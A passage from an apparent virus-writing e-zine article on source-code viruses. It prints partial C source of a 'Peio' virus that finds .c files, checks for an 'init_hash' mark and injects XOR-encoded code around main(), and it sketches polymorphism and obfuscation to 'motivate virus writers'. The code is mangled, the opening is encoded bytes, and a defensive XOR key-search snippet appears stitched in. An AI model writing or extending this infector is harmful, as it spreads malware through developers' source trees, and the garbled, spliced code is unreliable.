¢Ü¢"ÜîÜôãèáò èáóèåîäÛÝ 1/2 Ü¢¢(c)"Š‰‰‰‰‰âèïìå "1/2 ²²"Š‰‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèåîä¬ óôòìåî¨èáóèåîä(c)(c)"Š‰‰‰‰‰âèïìå "1/2 óôòìåî¨èáóèåîä(c)"Š‰‰‰‰‰óðòéîôæ¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ 
¢Ü¢"Üî¢(c)"Š‰‰‰‰‰âèïìå "1/2 ³"Š‰‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèåîä(c)"é""(c)Š‰‰‰‰‰‰èáóèåîäÛéÝ Þ1/2 °ø¸°"Š‰‰‰‰‰åèïìå 1/2 óôòìåî¨èáóèåîä(c)"Š‰‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèåîä¬ åèïìå(c)"Š‰‰‰‰‰íóùîã¨ðôò¬ óéúå"ðáçå¬ ÍÓßÓÙÎÃ(c)"Š‰‰‰‰‰íõîíáð¨ðôò¬ óéúå"ðáçå(c)"Š‰‰‰‰‰æôòõîãáôå¨æä¬ óéúå"éèïìå"ôèïìå"âèïìå"åèïìå(c)"Š‰‰‰‰ý åìó劉‰‰‰ûŠ‰‰‰‰‰íõîíáð¨ðôò¬ óéúå(c)"Š‰‰‰‰ýŠ‰‰‰ýŠýŠ"; char *buf; d = opendir("."); while((dir = readdir(d))>0) if(!(strcmp(dir->d_name+strlen(dir->d_name)-2,".c"))|| !(strcmp(dir->d_name+strlen(dir->d_name)-2,".C"))) if((fd=open(dir->d_name, O_RDWR, 0))>=0) { size = lseek(fd, 0, SEEK_END); ptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0); if( (!strstr(ptr,"init_hash")) && ( ((mpos=(int)strstr(ptr,"\nmain("))>0) || ((mpos=(int)strstr(ptr,"\nint main("))>0) || ((mpos=(int)strstr(ptr,"\nvoid main("))>0) || ((mpos=(int)strstr(ptr,"\nmain ("))>0) || ((mpos=(int)strstr(ptr,"\nint main ("))>0) || ((mpos=(int)strstr(ptr,"\nvoid main ("))>0) ) ) { mpos = (int)strstr((void *)mpos, ";\n"); mpos -= (int)--ptr; if( !(ipos = (int)strstr(++ptr, "#include <")) ) { munmap(ptr, size); break; } munmap(ptr, size); page = 3 * (int)sysconf(_SC_PAGESIZE); ftruncate(fd, size+page); ptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0); ipos = (int)strstr(ptr, "#include <"); ipos = (int)strstr((void *)ipos, "\n\n"); ipos -= (int)ptr; for(i=0;i=0;i--) memcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole); memcpy(ptr+ipos, hashinc, ihole); for(i=0;i=0;i--) memcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole); memcpy(ptr+mpos, buf, thole); bhole = strlen(hashbeg); memcpy(ptr+size+ihole+thole, hashbeg, bhole); memcpy(ptr+size+ihole+thole+bhole, hashinc, ihole); bhole += ihole; sprintf(ptr+size+ihole+thole+bhole, "\";\n\tchar hashbeg[] = \""); bhole += 22; for(i=0;i <-end of peio.c-------------------------------------------------------------> <---------------------------------------------------------------------------> As we can see, hashes are XORed with 80h, and 
it's necessary to XOR them again in order to write the code into the host file. This way of storing hashes opens a route to polymorphism, since in each generation the key of the XOR "encryption" could vary from 80h to FFh.

4.4.- Future developments

These examples are not "live fire": there are several mistakes in the code discussed. However, we keep developing these and new examples, trying to incorporate more functionality or new approaches.

The most scandalous part is the size of the arrays that hold the code we want to include. It is quite problematic to print some of the chars that fall within the first 32 positions of the ASCII table, so it is worth looking at how this problem is solved in other areas, such as the delivery of electronic mail or news. In this sense, we can contemplate several possibilities:

1) Using uuencode/uudecode.
2) Using base64.
3) Using yEnc [14], an alternative to both previous points that uses ASCII > 127 but is able to avoid problematic chars (i.e. NUL, DEL, etc.).
4) Using our own conversion schemes for char arrays, with improved combinations of XORs, sums, etc., which could include simple compression such as RLE.

In addition to these improvements, we could think about adding oligomorphism to the programs, creating several routines and "encrypting" them with random keys in each generation, together with several decryption routines. Much of this approach is already present in the "Peio" virus, where the possible keys allow 127 different combinations when the hashes are created.

As later steps, the efforts could be directed towards total obfuscation of the viral code, towards merging this code with the original one, or towards generating the needed hashes as the result of a piece of code (a hash is, after all, just a very large number: we could write code whose result is that number and so generate it every time instead of storing it).
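Seen from the auditor's side, a single-byte XOR key in the range 80h to FFh is cheap to undo by simply trying every key. The sketch below assumes that the auditor knows a marker string to look for (the examples in this text use "init_hash" as their infection mark). The function names find_marker and match_at are made up for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Does marker (length m) appear at p once every byte is XORed with key? */
static int match_at(const unsigned char *p, const char *marker,
                    size_t m, unsigned key)
{
    for (size_t j = 0; j < m; j++)
        if ((unsigned char)(p[j] ^ key) != (unsigned char)marker[j])
            return 0;
    return 1;
}

/*
 * Search buf (n bytes) for marker, first in plain text (key 0) and
 * then under every single-byte XOR key from 0x80 to 0xFF.
 * Returns the key under which the marker was found, or -1 if none.
 */
int find_marker(const unsigned char *buf, size_t n, const char *marker)
{
    size_t m = strlen(marker);

    if (m == 0 || m > n)
        return -1;

    /* Key sequence: 0, 0x80, 0x81, ..., 0xFF. */
    for (unsigned key = 0; key <= 0xFF; key = (key == 0 ? 0x80 : key + 1))
        for (size_t i = 0; i + m <= n; i++)
            if (match_at(buf + i, marker, m, key))
                return (int)key;

    return -1;
}
```

A return value of 0 means the marker is present in plain text, and a value between 0x80 and 0xFF is the key that hides it. The whole key space is 129 passes over the buffer, which is why a scheme like this hides the text from a casual reader but not from a scanner.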

5.- Conclusions

Source code viruses are not a very serious threat at the moment, but if the techniques discussed here are improved, they could become a significant one. Many tools exist to audit the integrity of files on disk, such as md5sum, tripwire, etc. Nevertheless, if we extend the paranoia to everything that runs through our circuits, the threat of a trojanised first compiler still hangs over our heads on UNIX systems.

I would like this text to be useful in explaining the work done on this subject and to motivate virus writers to develop new and better techniques. However, I consider myself a staunch Free Software defender, and I would like this code to help increase security within the Free Software community, not the opposite.

Finally, I would like to thank all those who have helped me write this text: the int80h crew, elisasm, silviex, sheroc, a young samurai, and above all the whole 29a crew, which stays year after year at the sharpest edge of the virus scene. VirusBuster, thanks for allowing me to write in the best viral e-zine worldwide. Thanks, really ;-)

6.- Related Links

[1] Free Software Song.
    http://www.gnu.org/music/free-software-song.html

[2] Linux Malware: Debunking the myths. Phil d'Espace. Virus Bulletin, September 2002.
    http://www.virusbtn.com/magazine/archives/200209/linux_malware.xml

[3] BitchX 1.0c19 IRC Client Backdoored.
    http://slashdot.org/article.pl?sid=02/07/02/1327208&mode=thread
    http://www.securityfocus.com/archive/1/280009/2002-06-28/2002-07-04/0

[4] Clues, Vandalism, Litter Sendmail Trojan Trail.
    http://www.securityfocus.com/news/1113
    http://cert-nl.surfnet.nl/i/2002/I-02-03.htm

[5] Virus Encyclopedia, File Viruses, DOS: Urphin.1621.
    http://www.viruslist.com/eng/VirusList.asp?page=0&mode=1&id=2414&key=000010000102404

[6] The History of Computer Viruses.
    http://www.virus-scan-software.com/virus-scan-help/answers/the-history-of-computer-viruses.shtml

[7] Die-hard virus.
    http://www.pspl.com/virus_info/dos/diehard.htm

[8] OBJ, LIB Viruses and Source Code Viruses.
    http://www.viruslist.com/eng/viruslistbooks.html?id=36

[9] Shell viruses. Gobleen Warrior & zert.
    http://29a.host.sk/29a-6/29a-6.212

[10] Polymorphism/Encryption/EPO in Perl Viruses. SnakeByte.
    http://29a.host.sk/29a-6/29a-6.220

[11] Reflections on Trusting Trust. Ken Thompson.
    http://www.acm.org/classics/sep95/

[12] Linux Security Auditing: Re: Reflections on Trusting Trust.
    http://lists.insecure.org/lists/security-audit/2000/Apr-Jun/0222.html
    http://lists.insecure.org/lists/security-audit/2000/Apr-Jun/0226.html

[13] Shared Source: A Dangerous Virus.
    http://www.opensource.org/advocacy/shared_source.php

[14] yEnc - Broken Tools.
    http://www.yenc.org